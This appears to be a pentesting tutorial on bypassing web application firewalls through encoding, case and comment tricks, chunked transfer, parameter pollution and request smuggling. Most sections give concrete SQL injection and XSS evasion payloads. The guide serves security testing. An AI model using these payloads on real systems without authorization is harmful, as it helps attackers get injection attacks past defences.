WAF Bypass Techniques: Encoding, Chunked Transfer, and Case Manipulation (2025)

Web Application Firewalls (WAFs) are the first line of defense for most web applications. Whether it's AWS WAF, Cloudflare, Akamai, ModSecurity, or Imperva, these firewalls inspect HTTP traffic and block requests matching known attack patterns. But WAFs rely on pattern matching — and pattern matching can be defeated with creative encoding, request manipulation, and protocol-level tricks.

This guide covers battle-tested WAF bypass techniques used by professional pentesters and bug bounty hunters in 2025.

Understanding WAF Detection Mechanisms

Before bypassing a WAF, understand how it works:

• Signature-based: Matches against a database of known attack patterns (e.g., UNION SELECT, <script>)
• Anomaly-based: Flags requests that deviate from a learned baseline (unusual parameter lengths, encoding, etc.)
• Behavioral: Tracks request frequency, source reputation, and session patterns
• Machine learning: Uses trained models to classify malicious vs. legitimate traffic

Most WAFs combine these approaches, but signature-based detection is the primary mechanism — and the easiest to bypass.

Encoding-Based Bypasses

URL Encoding

The most fundamental bypass. WAFs may decode one layer of URL encoding but miss double or triple encoding:

# Single URL encoding
%27%20OR%201%3D1--

# Double URL encoding
%2527%2520OR%25201%253D1--

# Triple URL encoding (for layered WAF + app decoding)
%252527%252520OR%2525201%25253D1--

Use our Encoding Pipeline to chain multiple encoding layers and test which combination slips through.

Unicode and UTF-8 Encoding

WAFs often fail to normalize Unicode representations:

# Unicode full-width characters
＜script＞alert(1)＜/script＞

# UTF-8 overlong encoding (non-standard but some parsers accept it)
%C0%BC = <
%C0%BE = >

# Unicode normalization bypass
\u003Cscript\u003Ealert(1)\u003C/script\u003E

HTML Entity Encoding

Mix decimal, hex, and named HTML entities to confuse WAF pattern matching:

# Mixed HTML entities
<script>alert(1)</script>

# Zero-padded hex entities
<script>

Base64 and Hex Encoding

Some applications decode Base64 or hex input server-side — inject encoded payloads that the WAF sees as harmless strings:

# Base64-encoded payload in a parameter the app decodes
data=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

# Hex-encoded SQL injection
0x554e494f4e2053454c454354 = UNION SELECT

Our Encoder/Decoder tool supports Base64, hex, URL encoding, and HTML entities — perfect for crafting encoded payloads.

Case Manipulation and Comment Injection

Mixed Case

Many WAFs use case-sensitive pattern matching:

# SQL injection
uNiOn SeLeCt
UnIoN/**/sElEcT

# XSS
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x OnErRoR=alert(1)>

SQL Comment Injection

Inline comments break up keywords that WAFs match as a single token:

# MySQL inline comments
UN/**/ION SEL/**/ECT
/*!50000UNION*/ /*!50000SELECT*/

# Multi-line comments
UNION/*random junk here*/SELECT

# MySQL version-specific comments (only executes on MySQL >= 5.0)
/*!50000UNION ALL SELECT*/

Whitespace Alternatives

Replace spaces with alternative whitespace characters:

# Tab instead of space
UNION%09SELECT

# Newline
UNION%0ASELECT
UNION%0DSELECT

# Vertical tab, form feed
UNION%0BSELECT
UNION%0CSELECT

# MySQL-specific: parentheses as separators
UNION(SELECT(1),(2),(3))

Chunked Transfer Encoding

Chunked transfer encoding splits the HTTP body into chunks. Many WAFs reassemble chunks before inspection, but some don't handle edge cases:

Transfer-Encoding: chunked

4
UNIO
7
N SELEC
1
T
0

Advanced technique — use chunk extensions and trailers to further confuse WAF parsers:

Transfer-Encoding: chunked

4;extension=value
UNIO
7;another=ext
N SELEC
1
T
0

HTTP Parameter Pollution (HPP)

Send the same parameter multiple times — different servers handle duplicates differently:

# PHP uses the last value, ASP.NET concatenates with commas
?id=1&id=UNION&id=SELECT&id=1,2,3--

# Apache: first value | IIS: all values | Tomcat: first value
?search=harmless&search=<script>alert(1)</script>

HTTP Request Smuggling for WAF Bypass

If the WAF and backend server parse HTTP differently, you can smuggle payloads past the WAF:

# CL.TE smuggling
POST / HTTP/1.1
Content-Length: 6
Transfer-Encoding: chunked

0

PAYLOAD_HERE

Learn more about request smuggling in our HTTP Smuggling Generator.

Content-Type Manipulation

WAFs may only inspect certain content types. Try switching:

# Instead of application/x-www-form-urlencoded, try:
Content-Type: application/json
{"param": "' OR 1=1--"}

# Or multipart form data
Content-Type: multipart/form-data; boundary=----
------
Content-Disposition: form-data; name="param"

' OR 1=1--
------

Automated WAF Bypass with Payload Playground

Our WAF Bypass Generator automates these techniques — select a base payload, choose your bypass methods (encoding, case manipulation, comment injection, whitespace substitution), and generate dozens of variants instantly.

Combine it with the SQL Injection Generator for database-specific payloads, or the XSS Generator for script injection variants that evade WAF rules.

Testing Methodology

1. Identify the WAF — check response headers (Server, X-Powered-By), error pages, and use tools like wafw00f
2. Test baseline — confirm which payloads are blocked vs. allowed
3. Apply bypass techniques — start with encoding, then try case manipulation, comments, HPP
4. Chain techniques — combine multiple bypasses (e.g., double-encoded + mixed case + inline comments)
5. Verify execution — ensure the payload still executes after all transformations

For a complete reference of WAF-evading payloads, see our WAF Bypass Cheat Sheet.